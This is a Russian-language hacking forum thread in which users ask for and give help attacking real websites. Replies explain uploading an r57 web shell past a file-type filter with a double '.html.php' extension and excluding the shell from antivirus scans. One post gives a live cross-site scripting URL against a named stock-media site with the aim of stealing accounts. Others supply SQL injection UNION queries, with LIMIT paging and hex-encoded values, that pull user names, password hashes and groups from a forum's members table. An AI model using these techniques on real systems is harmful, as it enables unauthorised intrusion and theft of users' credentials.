Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    geforce
    Мне кажется тебе дали линк на статью. Что, теперь нужно её сюда специально для тебя переписать?
    Вот ещё одна, читай, потом пиши
    https://forum.antichat.ru/thread23501.html

    Там все ответы
     
  2. Saiga

    Saiga New Member

    Joined:
    22 Jul 2008
    Messages:
    49
    Likes Received:
    2
    Reputations:
    1
    здравствуйте

    Перейду к делу.На сайт достал админку , теперь хочу залить шелл. ( r57shell Версия: 1.24 )

    но проблема в том файлы которые можна добавить должны быть обязательно такого формата (gif, jpg, png, htm, html, pdf, zip, swf, mp3, flv, doc, docx, xls, xlsx, rtf )

    ни разу этого еще не делал . сильно не пинайте ))
    По полкам не надо раскладывать , проста и доступна , остальное сам до думою


    Спасибо за время.
     
  3. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    Все испробовал!!! Что дальше делать ничего не вышло???
     
  4. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Попробуй дать своему шеллу расширение *.html.php
    Иногда проходит, так как в некоторых скриптах смотрится на расширение идущее после первой точки:
    PHP:
    ...
    $exps=array('rar','zip','doc','html');
    $rash=explode(".",$_FILES["userfile"]['name']);
    if(!
    in_array(strtolower($rash[1]), $exps))
    die(
    'fuck!');
    ...
     
    #6924 -m0rgan-, 7 May 2009
    Last edited: 7 May 2009
  5. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    А что ты хочишь получить от даной уязвимости?
     
  6. AET

    AET New Member

    Joined:
    17 Mar 2008
    Messages:
    23
    Likes Received:
    1
    Reputations:
    -2
    люди при скачивани шели мои антивирус начинает ругать что это потенциально апасное по это так и должно быть
     
  7. D1mOn

    D1mOn Elder - Старейшина

    Joined:
    2 Oct 2005
    Messages:
    380
    Likes Received:
    144
    Reputations:
    29
    Да это нормально, добавь файл в исключения, чтобы антивирус не сканировал его.
     
  8. AET

    AET New Member

    Joined:
    17 Mar 2008
    Messages:
    23
    Likes Received:
    1
    Reputations:
    -2
    а что означает фреим
     
  9. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    http://ru.wikipedia.org/wiki/Фрейм
     
  10. AET

    AET New Member

    Joined:
    17 Mar 2008
    Messages:
    23
    Likes Received:
    1
    Reputations:
    -2
    аааа это я по думал чтото другое типа лексики хакера ну извените
     
  11. udman

    udman Elder - Старейшина

    Joined:
    21 Apr 2009
    Messages:
    224
    Likes Received:
    105
    Reputations:
    25
    Всем привет. Поджскажите мне плиз, реально ли как-то получить аккаунт с помошью такой вот уязвимости?

    http://footage.shutterstock.com/videos.html?clipbox_id=255910%22%3E%3Cscript%3Ealert(/d/)%3C/script%3E

    там просто четкие фотки и видео ХД хочу писец ))
     
  12. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Версия форума vBulletin 3.5.8
    В какой таблице пассы админа?
    Как залить шелл через админку?
     
  13. Serge24

    Serge24 Banned

    Joined:
    6 May 2009
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Помогите со sql запросом:
    Имя базы: dbforum1
    Имя таблицы: ibf_members
    Имена нужных строк: name, mgroup, password
    Покажите на примере как запросить эти данные у пользователя с id=399999
    Или у пользователя с name=LOL
    UNION SELECT...
    PS: Можно внедрять только один параметр.
     
  14. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    select concat_ws(0x3a,name,password,mgroup) from dbforum.ibf_members
     
    1 person likes this.
  15. Serge24

    Serge24 Banned

    Joined:
    6 May 2009
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    а where id, where name ненадо? :)
    Я в sql неразбираюсь просто
     
  16. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    where+name='LOL'
     
  17. Serge24

    Serge24 Banned

    Joined:
    6 May 2009
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    А-а-а Спасибо, получилось имя вывести, Огромный тебе РЕСПЕКТ.

    Подскажи пожайлуйста как посмотреть вторую, третью, 545788 строчку :D
     
  18. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    select concat_ws(0x3a,name,password,mgroup) from dbforum.ibf_members limit 1,1

    select concat_ws(0x3a,name,password,mgroup) from dbforum.ibf_members limit 545788,1
     
  19. Serge24

    Serge24 Banned

    Joined:
    6 May 2009
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Там так не получится :(
    [​IMG]
     
  20. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Переводи в hex.

    where+name=0x4c4f4c
     
    #6940 R1dex, 7 May 2009
    Last edited: 7 May 2009
Thread Status:
Not open for further replies.